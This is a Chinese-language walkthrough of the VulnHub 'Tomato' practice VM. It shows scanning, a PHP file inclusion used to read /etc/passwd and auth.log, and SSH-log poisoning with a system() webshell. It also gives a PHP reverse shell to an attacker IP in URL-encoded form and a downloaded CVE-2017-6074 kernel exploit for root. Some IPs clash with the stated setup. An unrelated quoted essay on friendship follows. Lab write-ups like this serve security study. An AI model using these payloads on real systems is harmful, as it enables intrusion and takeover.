学习笔记下载

https://download.csdn.net/download/qq_41901122/14122059

环境搭建

下载地址：

https://www.vulnhub.com/entry/tomato-1,557/

kali 192.168.232.140

tomato: 192.168.232.175

win10 :192.168.232.171

第一部分 信息收集

第一步 扫描，发现主机

nmap -sP 192.168.232.0/24
arp-scan -l

第二步 扫描开放的端口

nmap -A -p- 192.168.232.175
nmap -sS -sV -p- -v  192.168.232.175 

第三步 访问网站，查看网站信息，查看网站的源代码

http://192.168.232.175/

第二部分 漏洞查找

第一步 扫描目录

dirb http://192.168.232.175
python3 dirmap.py  -i http://192.168.232.175 -lcf 

---- Scanning URL: http://192.168.232.175/ ----
==> DIRECTORY: http://192.168.232.175/antibot_image/                                                           
+ http://192.168.232.175/index.html (CODE:200|SIZE:652)                                                        
+ http://192.168.232.175/server-status (CODE:403|SIZE:280)   

第二步 访问目录，发现目录遍历漏洞

http://192.168.232.175/antibot_image/

第三步 查找可利用的文件

http://192.168.232.175/antibot_image/antibots/info.php
主要是查看注释

<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<!-- </?php include $_GET['image']; -->

</body>
</html>

第四步 利用文件包含漏洞

http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../etc/passwd

第五步 利用文件包含漏洞，查看日志文件

http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log

第三部分 漏洞利用

第一步 已知info.php文件存在文件包含漏洞，以及开放ssh端口，

尝试包含ssh认证日志文件/var/log/auth.log，并利用ssh认证用户名实现命令注入：（使用之前发现的2211端口是ssh，日志里面发现tomato用户，查看日志信息）

第二步 利用<?php system($_GET['cmd']);?>作为用户名进行php代码注入：

ssh '<?php system($_GET['cmd']);?>'@192.168.232.175 -p 2211

ssh '<?php system($_GET['cmd']);?>'@192.168.232.187 -p 2211

第三步 验证PHP代码是否注入成功

http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=ls

第二步 利用php,开启nc监听

nc -lvvp 666

第三步 反弹shell

php反弹shell代码：

hp -r '$sock=fsockopen("192.168.232.140",666);exec("/bin/sh -i <&3 >&3 2>&3");'

进行url编码后：

php+-r+%27%24sock%3dfsockopen(%22192.168.232.140%22%2c666)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27

触发反弹shell

http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=php+-r+%27%24sock%3dfsockopen(%22192.168.232.140%22%2c666)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27

第四步 开启交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

第四部分 提权

第一步 查看系统信息

uname -a
whoami

第二步 下载提权脚本，执行，编译

使用CVE-2017-6074的poc
git clone https://github.com/kkamagui/linux-kernel-exploits.git
cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074
./compile.sh

第三步 把exp上传到网站根目录，授予权限，并执行

cd /tmp 
wget http://192.168.232.129/CVE-2017-6074
chmod +x CVE-2017-6074
./CVE-2017-6074

第四步 查找flag

cd /root
ls
cat proof.txt

摘抄

---

去靠近给你正能量的朋友圈。

谁也都知道，朋友对于性格形成的影响非常重大。
一个人的好坏，朋友熏染的力量要居大半。
每个人身旁有一个“圈子”，这圈子就是他所曾亲近的人围成的，
他跳来跳去，却跳不出这圈子。
在某一种圈子就成为某一种人。
古人说：“与善人交，如入芝兰之室，久而不闻其香；
与恶人交，如入鲍鱼之市，久而不闻其臭。”
一个人应该谨慎择友，择他所在的圈子，道理就在此。
出自《谈交友》作者丨朱光潜

---